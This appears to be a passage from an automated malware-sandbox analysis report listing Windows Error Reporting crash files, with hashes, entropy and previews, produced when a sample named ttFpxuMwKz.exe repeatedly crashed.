                                  Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.2.8.4.9.1.0.4.3.6.6.5.0.7.0.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.a.a.0.a.4.e.2.-.4.7.6.4.-.4.9.1.a.-.9.c.6.4.-.9.3.0.0.6.a.4.c.5.c.8.e.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.1.b.7.5.1.5.1.-.3.6.3.6.-.4.4.a.0.-.8.0.d.b.-.2.b.8.8.4.0.e.c.5.4.2.3.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.t.t.F.p.x.u.M.w.K.z...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.9.5.0.-.0.0.0.1.-.0.0.1.4.-.b.e.0.1.-.e.d.9.f.5.a.1.9.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.6.a.1.b.8.3.3.9.c.4.f.d.e.2.5.d.7.9.f.9.7.1.1.f.5.5.9.b.5.2.8.1.0.0.0.0.f.f.f.f.!.0.0.0.0.4.8.4.6.9.9.f.e.4.e.c.d.e.2.9.d.a.1.c.5.c.7.3.8.9.2.8.8.1.c.e.a.2.f.9.8.e.b.8.a.!.t.t.F.p.x.u.M.w.K.z...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.1.0././.0.7.:.1.0.:.5.4.:.0.7.!.0.!.t.t.F.p.x.u.M.w.K.z...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.

                                  C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_ttFpxuMwKz.exe_e342d3f8e7937e4f5791c4c6cfa5b7779f350_c40db49f_47ed8e40-65f1-462f-b148-dbfdf26337df\Report.wer

                                  Download File
                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):65536
                                  Entropy (8bit):0.8883675043552418
                                  Encrypted:false
                                  SSDEEP:192:/D6jRens056rgjuSZr+3zuiFfZ24IO8+:/ejRen56rgjO3zuiFfY4IO8+
                                  MD5:D846AF3335751D6D886430C931C4ECEF
                                  SHA1:01CED0F6221B85335D2CA56407F55AEE59190B80
                                  SHA-256:51C039D1BDF300E3797D98A8686152578DDD8AEAD51B36D17A482E41FA1EDACD
                                  SHA-512:209C240D3623F9B709A9834CAA1DBEB56B7F92BA2AF897A06E051541D7CAD4E6D8EE020B145FDCA50C44E3B62717FD88BC8730AA1767C6B5FBE11861C7643BC5
                                  Malicious:true
                                  Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.2.8.4.9.1.0.2.5.4.4.2.6.6.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.7.e.d.8.e.4.0.-.6.5.f.1.-.4.6.2.f.-.b.1.4.8.-.d.b.f.d.f.2.6.3.3.7.d.f.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.b.5.8.8.3.1.c.-.2.a.b.3.-.4.0.2.7.-.b.2.9.3.-.a.d.1.2.0.7.f.a.b.1.b.2.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.t.t.F.p.x.u.M.w.K.z...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.9.5.0.-.0.0.0.1.-.0.0.1.4.-.b.e.0.1.-.e.d.9.f.5.a.1.9.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.6.a.1.b.8.3.3.9.c.4.f.d.e.2.5.d.7.9.f.9.7.1.1.f.5.5.9.b.5.2.8.1.0.0.0.0.f.f.f.f.!.0.0.0.0.4.8.4.6.9.9.f.e.4.e.c.d.e.2.9.d.a.1.c.5.c.7.3.8.9.2.8.8.1.c.e.a.2.f.9.8.e.b.8.a.!.t.t.F.p.x.u.M.w.K.z...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.1.0././.0.7.:.1.0.:.5.4.:.0.7.!.0.!.t.t.F.p.x.u.M.w.K.z...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.

                                  C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_ttFpxuMwKz.exe_e342d3f8e7937e4f5791c4c6cfa5b7779f350_c40db49f_b0bac0b5-03c4-4e08-9ef7-3f07423e4c41\Report.wer

                                  Download File
                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):65536
                                  Entropy (8bit):0.8886796174727082
                                  Encrypted:false
                                  SSDEEP:96:0mgi65ey+IWs1nh+SoA7Rh6tQXIDcQnc6rCcEhcw3rqIp+HbHg/8BRTf3Oy1F/cX:/6jRWns056rgjuSZr+3zuiFfZ24IO8+
                                  MD5:2A70A539AB00C529760E6D16E25C9AAD
                                  SHA1:7DE0211EE51C33C5CFA519BFA96C76F250C4BF36
                                  SHA-256:47E5E500BA8C0258CEED0E874799A214129AEDF838870B310C6223DA2DC279CF
                                  SHA-512:DE8BF5F3F8FC8FCBA665C49C65F97D7A1FED04C3CE28E7C1AFCA113426B7F08955F705D8995CB3C499790CCF17507761140ACBD8CBBF99FDF8005B93780F5AA6
                                  Malicious:true
                                  Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.2.8.4.9.1.0.1.8.2.3.1.3.8.0.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.0.b.a.c.0.b.5.-.0.3.c.4.-.4.e.0.8.-.9.e.f.7.-.3.f.0.7.4.2.3.e.4.c.4.1.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.b.1.2.7.4.a.2.-.7.d.1.a.-.4.2.6.d.-.b.d.6.7.-.c.4.2.f.a.9.9.5.3.3.8.5.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.t.t.F.p.x.u.M.w.K.z...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.9.5.0.-.0.0.0.1.-.0.0.1.4.-.b.e.0.1.-.e.d.9.f.5.a.1.9.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.6.a.1.b.8.3.3.9.c.4.f.d.e.2.5.d.7.9.f.9.7.1.1.f.5.5.9.b.5.2.8.1.0.0.0.0.f.f.f.f.!.0.0.0.0.4.8.4.6.9.9.f.e.4.e.c.d.e.2.9.d.a.1.c.5.c.7.3.8.9.2.8.8.1.c.e.a.2.f.9.8.e.b.8.a.!.t.t.F.p.x.u.M.w.K.z...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.1.0././.0.7.:.1.0.:.5.4.:.0.7.!.0.!.t.t.F.p.x.u.M.w.K.z...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.

                                  C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_ttFpxuMwKz.exe_e342d3f8e7937e4f5791c4c6cfa5b7779f350_c40db49f_e348d49b-6f14-44d5-a093-b5bb7601e85c\Report.wer

                                  Download File
                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):65536
                                  Entropy (8bit):0.8885196084383683
                                  Encrypted:false
                                  SSDEEP:192:y16jRxns056rgjuSZr+3zuiFfZ24IO8+:VjRxn56rgjO3zuiFfY4IO8+
                                  MD5:512E132F088AF97390D0792BB42EC763
                                  SHA1:1AACE210BFDAA84A917D195D45A1EA6184EC5929
                                  SHA-256:4B526DF24C0C71CF2FF9144F7B6063EFD7F41952D17AF1F787862972E3EFFCBB
                                  SHA-512:D56408ED750B47FDA7F813D2656111852BD951571F517283AFF8F436B094A9B0D25F9FF72B103BB43E6B1869C83436EF7A4277818457B156E61A77F457767BD3
                                  Malicious:true
                                  Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.2.8.4.9.1.0.0.0.2.2.5.7.0.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.3.4.8.d.4.9.b.-.6.f.1.4.-.4.4.d.5.-.a.0.9.3.-.b.5.b.b.7.6.0.1.e.8.5.c.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.a.a.4.2.f.e.0.-.b.9.9.a.-.4.2.4.4.-.9.5.9.c.-.9.6.2.d.3.5.2.6.5.3.0.a.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.t.t.F.p.x.u.M.w.K.z...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.9.5.0.-.0.0.0.1.-.0.0.1.4.-.b.e.0.1.-.e.d.9.f.5.a.1.9.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.6.a.1.b.8.3.3.9.c.4.f.d.e.2.5.d.7.9.f.9.7.1.1.f.5.5.9.b.5.2.8.1.0.0.0.0.f.f.f.f.!.0.0.0.0.4.8.4.6.9.9.f.e.4.e.c.d.e.2.9.d.a.1.c.5.c.7.3.8.9.2.8.8.1.c.e.a.2.f.9.8.e.b.8.a.!.t.t.F.p.x.u.M.w.K.z...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.1.0././.0.7.:.1.0.:.5.4.:.0.7.!.0.!.t.t.F.p.x.u.M.w.K.z...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.

                                  C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_ttFpxuMwKz.exe_e342d3f8e7937e4f5791c4c6cfa5b7779f350_c40db49f_f9459472-98d4-4d39-bf8a-aef8a2aff7e4\Report.wer

                                  Download File
                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):65536
                                  Entropy (8bit):0.9374215002294458
                                  Encrypted:false
                                  SSDEEP:192:pLFS6jREns056rgjuSZr+d+zuiFfZ24IO8+:pLdjREn56rgjOszuiFfY4IO8+
                                  MD5:AD0BCEE4E2933B06BE9746BD36AC40A5
                                  SHA1:5CCF585B5BF1F99775DC3AAE9B84E6305D7DEBF1
                                  SHA-256:AD6178AA596EB1364C94EAA6D28E0D097C42DF2446091D0C442848C0F9461FDF
                                  SHA-512:886CD38AA540D84C32E0C1CB3EEA0F686F17E8A1DF09B027D8D0C673DDF29AE300303CC40351E589961A69612FAFABD54BAC733001B47B6A9DF851AFD8C98243
                                  Malicious:true
                                  Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.2.8.4.9.1.0.4.9.5.5.7.7.0.0.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.9.4.5.9.4.7.2.-.9.8.d.4.-.4.d.3.9.-.b.f.8.a.-.a.e.f.8.a.2.a.f.f.7.e.4.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.c.5.a.f.a.a.1.-.2.6.9.1.-.4.6.6.3.-.a.0.b.a.-.f.1.a.c.b.d.3.1.0.5.7.5.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.t.t.F.p.x.u.M.w.K.z...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.9.5.0.-.0.0.0.1.-.0.0.1.4.-.b.e.0.1.-.e.d.9.f.5.a.1.9.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.6.a.1.b.8.3.3.9.c.4.f.d.e.2.5.d.7.9.f.9.7.1.1.f.5.5.9.b.5.2.8.1.0.0.0.0.f.f.f.f.!.0.0.0.0.4.8.4.6.9.9.f.e.4.e.c.d.e.2.9.d.a.1.c.5.c.7.3.8.9.2.8.8.1.c.e.a.2.f.9.8.e.b.8.a.!.t.t.F.p.x.u.M.w.K.z...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.1.0././.0.7.:.1.0.:.5.4.:.0.7.!.0.!.t.t.F.p.x.u.M.w.K.z...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.

                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WERAA52.tmp.dmp

                                  Download File
                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                  File Type:Mini DuMP crash report, 14 streams, Tue Oct 8 08:18:20 2024, 0x1205a4 type
                                  Category:dropped
                                  Size (bytes):85424
                                  Entropy (8bit):1.8183126099801215
                                  Encrypted:false
                                  SSDEEP:384:Bu0VLziJAE31o3HHfl2k9Tt1MgJJBD/7mVgbiH:BTV3gAE31oPlpTt66D/7mH
                                  MD5:618535972D2820ADDC2EC4CD41182C51
                                  SHA1:B31F02DD65BC77FC3CFF1060573D4134705DF74B
                                  SHA-256:1B115A2EA77C1594F9F3B1551A8B1DB98BCFFDB09C85E8E162759E3FE038DF5E
                                  SHA-512:3DBF013ED967ED7B5A830AA1FCDBAF722C5C1B9F06F5950C0FA95AE9C14844BF3A435D28428893B581AF0533C4A862534FAF4AB9E1FE0846986C04DEE52583D3
                                  Malicious:false
                                  Preview:MDMP..a..... ..........g.........................................0..........T.......8...........T................-......................................................................................................eJ......d.......GenuineIntel............T.......P......g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WERAE89.tmp.WERInternalMetadata.xml

                                  Download File
                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):8440
                                  Entropy (8bit):3.700724749433386
                                  Encrypted:false
                                  SSDEEP:192:R6l7wVeJTS6sbf6YEIKkSUPD8gmfI9GpBr89bdasfJ/m:R6lXJG6A6YE+SUPD8gmfGtd5fM
                                  MD5:2A56B9F3C34EF65F5F2DCB8EE3A44E28
                                  SHA1:8F832BA206668F54FF27CE61BA6A43BAD7183CB3
                                  SHA-256:5B78063635183D806A86C311EDC3B80B1DE69BD6FB7E7A1E45CEB12907A2A119
                                  SHA-512:EC3912E12377DBCBE108C665708868B639EDFFB49FB3D5DCF3606476AEA54D43B81D20C0650EFF8D959D3CD03459CF5679D5ED9AA60D0AF6CC48C006A539B9AB
                                  Malicious:false
                                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.4.8.0.<./.P.i.

                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WERAED8.tmp.xml

                                  Download File
                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):4720
                                  Entropy (8bit):4.490366231583568
                                  Encrypted:false
                                  SSDEEP:48:cvIwWl8zsbJg77aI9HXiTpWpW8VYXYm8M4JIvHFvL+q8vhXNj2NHQd:uIjf1I75XiTY7VHJwKRMNHQd
                                  MD5:235BEB8694877288F5281DA25B0B87AF
                                  SHA1:8203C65E26842FB485125E5DA8C6AC553C8D05E7
                                  SHA-256:23BDF68B90E190F32C7F98FF082CF79C8DA73279124FB2CC50F738A922AAB2B0
                                  SHA-512:F82E8C3AC519A31C48DE7C2E713C14DECBDF7A3E03CA4AF3FA6F764B2BFF30055C441F12D2C00C82643AF2910CBCA6CA0EFC6169BB2FA770FC9F3E5D2EEC2728
                                  Malicious:false
                                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="534201" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WERB167.tmp.dmp

                                  Download File
                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                  File Type:Mini DuMP crash report, 14 streams, Tue Oct 8 08:18:21 2024, 0x1205a4 type
                                  Category:dropped
                                  Size (bytes):85316
                                  Entropy (8bit):1.8398244565205872
                                  Encrypted:false
                                  SSDEEP:384:10VLzqDuAEpy3H7XhF9Tt1MgJJBD/7mVD+gNWnl:mV3qDuAE0jhfTt66D/7mvQn
                                  MD5:124843E51D41EF7BEBB26B974A1F8F7B
                                  SHA1:B2DC877D9425B032B5D9AFAF1EB81AD632D8F49D
                                  SHA-256:2E1E5A840D9D08D563EC594EBA7758C23B44B15A712D1724035A6089F3F2016C
                                  SHA-512:3B045CAEE6BFB8CFB7443D22CC9912624D1F11227088D2AB5257F10AE80A991EBB701C82CD4B940D2B6DFB1676FBF0E1AFFF3558D0B60997F4286F61E16C8207
                                  Malicious:false
                                  Preview:MDMP..a..... ..........g.........................................0..........T.......8...........T...........h ...,......................................................................................................eJ......d.......GenuineIntel............T.......P......g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WERB204.tmp.WERInternalMetadata.xml

                                  Download File
                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):8440
                                  Entropy (8bit):3.699919047749347
                                  Encrypted:false
                                  SSDEEP:192:R6l7wVeJT96i6YEIYSUPD8gmfI9GpBG89bGasf0im:R6lXJp6i6YE3SUPD8gmfGuG5fQ
                                  MD5:783CFFDE48682117910BC551EABF1412
                                  SHA1:6D2BF4628BA6FE74E7CACD4234DDB19E65F139EE
                                  SHA-256:70E30112D9293B5EF3263B046392ECA80CA67DBC113246EECA8B09764701AF94
                                  SHA-512:EA54D6C752973FD4BD7CB971C974E32825C96CE645A085CA3C9D5E802258416A2E40EFBFC327A4032FA301AFD16D3E2333BB606BE02C55E3F5394F3853081EB2
                                  Malicious:false
                                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.4.8.0.<./.P.i.

                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WERB234.tmp.xml

                                  Download File
                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):4720
                                  Entropy (8bit):4.490957257217505
                                  Encrypted:false
                                  SSDEEP:48:cvIwWl8zsbJg77aI9HXiTpWpW8VYSYm8M4JIvHFJB+q8vhXNj2NHQd:uIjf1I75XiTY7VyJQBKRMNHQd
                                  MD5:63057B6E60490DF018DB790368E40B3E
                                  SHA1:2F4A3E3567E92381903A7D948C76B4983B629D89
                                  SHA-256:B05F6DEC8359EF1C194F9B10074C27408B902AA8AABE1E091BB3A9A6E531EBA0
                                  SHA-512:3C63C1B8AA03B2624877973B909861B301BFFEFCA28C02E0381251FF1D5835332A95336177ED180383EA6974866B091173055C04ED3E755793B4655BDA239AA6
                                  Malicious:false
                                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="534201" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WERB435.tmp.dmp

                                  Download File
                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                  File Type:Mini DuMP crash report, 14 streams, Tue Oct 8 08:18:22 2024, 0x1205a4 type
                                  Category:dropped
                                  Size (bytes):94988
                                  Entropy (8bit):1.693124221925867
                                  Encrypted:false
                                  SSDEEP:384:w0iU++xYAEkzA/mwic6mJBD/7mVcU4NslR:w0P++6AEk8/mwXnD/7mqsn
                                  MD5:074462E52B9E8397B29BE1BAC027FA98
                                  SHA1:9CD64D3D28F14154BF1AB05C8DD53CF79B351E4A
                                  SHA-256:793976CA7CACA417740CD2B65A35D9148F8E4F8033115A59EA7CB37E1F212F7D
                                  SHA-512:DD761F0810E712DFB55BB29973D7CB82D70547EA50FB258FA6D2D3FF4E40376526693C7996F2E9759332001F123DD26DBDF7B4BABB1D40164516667DBCA9F6AB
                                  Malicious:false
                                  Preview:MDMP..a..... ..........g............T...............\............6..........T.......8...........T............!...Q..........@...........,...............................................................................eJ..............GenuineIntel............T.......P......g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WERB4E2.tmp.WERInternalMetadata.xml

                                  Download File
                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):8440
                                  Entropy (8bit):3.701598225156464
                                  Encrypted:false
                                  SSDEEP:192:R6l7wVeJTG6A66YEISSUPD8gmfI9GpBM89bGasfMim:R6lXJy6A66YEdSUPD8gmfG4G5fI
                                  MD5:2275E80139CE6A1D17155A7EA5AD2AD1
                                  SHA1:47726E7EFA5E158BB6EE30DE81156C70A18C3AAC
                                  SHA-256:A522246131AA8660FEA8C1C1AAA415F7788B43FE969A119456B1FA8CB5823813
                                  SHA-512:1A7382533076AC0C080FBFBCBECE6BD32E6EDAB78742551F8EC0C0B61382471D616A362266ED7C46A58F624F5B907C9DEB7C0850DC4308D0708107DAF5EE1733
                                  Malicious:false
                                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. 